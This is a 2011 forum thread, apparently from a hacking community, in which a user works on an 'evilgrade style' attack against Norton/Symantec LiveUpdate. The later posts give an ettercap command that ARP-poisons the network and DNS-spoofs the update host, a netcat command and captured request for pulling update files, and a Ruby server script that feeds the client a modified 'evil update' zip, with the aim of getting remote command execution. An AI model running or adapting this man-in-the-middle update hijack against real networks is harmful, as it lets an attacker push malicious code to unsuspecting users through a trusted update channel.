i8igmac Posted May 8, 2011 Share Posted May 8, 2011 Maybe I could get some ones opinion, I have captured a get request like /get symtec/id/dir/update.zip I can reproduce this get request with ruby sockets and receive the binary data of the zip file. I saved this data and tried to extract its contents but it fails. I hope to write my own evilgrade style exploit. Right now I'm on my Droid, I will post this get request and the binary data tonight. Any thoughts on how to properly handle this zip file please share Quote Link to comment Share on other sites More sharing options...
digip Posted May 8, 2011 Share Posted May 8, 2011 (edited) Are you sure the zip downloaded properly? They may cancel it, if it doesn't use the same user agent symantec uses to download it with, and it also might need an authentication hash or cookie of some sort to allow the download to work properly. Make sure you look at all the traffic with something like wireshark, and see what the request user agent is, if its a get or post, if it uses gzip encoding to download, etc, etc.. You could also just try navigating to the URL in your browser and see if it spits you the file. Edited May 8, 2011 by digip Quote Link to comment Share on other sites More sharing options...
i8igmac Posted May 9, 2011 Author Share Posted May 9, 2011 ettercap, filter to drop encryption for more plain text... i fixed my problem with extracting the file ,-) instead of pasting to text editor i just nc netcat xxx.xxx.xx 80 > out.zip GET /streaming/norton$202009$20streaming$20virus$20definitions_1.0_symalllanguages_livetri.zip HTTP/1.1. If-Modified-Since: Sun, 08 May 2011 03:51:51 GMT. Cache-control: max-age=0. Cache-Control: no-cache. Cache-Control: max-stale=0. Cache-Control: min-fresh=1000. Accept: */*. HOST: liveupdate.symantecliveupdate.com. User-Agent: +V2Ga/n+ZIRfedhlw5VItU2dHhkjA/GTQAAAAALUE. Connection: Keep-Alive. i open out.zip with text editor and removed the response header field from the top of the file and the file extracts just fine ,-) i would really like to share more in-depth because this looks promising... one of the files contents looks like this, one line MOVE([TempDir],%StreamDefDir%) i think this could give me sorta remote command execution a quick test would be 'ping 192.168.1.101' (my labtop ip) i found this log some one posted and now gives me a better view of whats going on... hxxp://community.norton.com/norton/attachments/norton/nis_feedback/92741/1/log.lu2.txt Quote Link to comment Share on other sites More sharing options...
i8igmac Posted May 18, 2011 Author Share Posted May 18, 2011 here is a quick update on what i have done so far... i was going to make a video but i see no need... the client successfully downloads the modified zip file from my computer during the dns spoof (screenshot of wireshark) i just need to modify the zip packages contents to trigger execution... sudo ettercap -T -F filter.ef -P dns_spoof -M arp // // first thing is the ettercap filter drops encryption for more plaintext (not sure if its needed for this situation but i like to use it) dns_spoof: [liveupdate.symantecliveupdate.com] spoofed to [192.168.1.104] sudo ruby exploit.rb (its something i put together in a few minutes, dont judge me ,-P require 'socket' #SERVER server = TCPServer.open(80) loop { client = server.accept print client.read(100) #should recive /get /minitri.flg client.puts("HTTP/1.1 200 OK Content-Length: 1 Content-Type: text/plain Last-Modified: Fri, 29 Jul 2005 20:24:32 GMT ETag: "+'"'+"1-42ea9080"+'"'+" Accept-Ranges: bytes Date: Sun, 15 May 2011 01:52:21 GMT Connection: keep-alive Cache-Control: public,must-revalidate,max-age=1800\n\r\n\r") print client.read(100) #should recive GET /update symnetc from client client.print("HTTP/1.1 200 OK Content-Type: application/zip Last-Modified: Sun, 15 May 2011 21:16:04 GMT ETag: W/"+'"'+"15a1-4dd04294"+'"'+" Accept-Ranges: bytes Date: Sun, 15 May 2011 20:50:18 GMT Connection: keep-alive Cache-Control: public,must-revalidate,max-age=240\n\r\n\r") #now send payload file = open('/home/bigmac/out.zip', "rb") # new evil update fileContent = file.read client.print(fileContent) #client.print "Closing the connection. Bye!" # client.close # Disconnect from the client } wireshark screenshot of the zipfile downloaded 192.168.1.102 <---> 192.168.1.104 img838.imageshack.us/i/screenshotwireshark.png ... i should post the zipfile, im sure all that is needed is changing a few numbers around to trigger execution Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.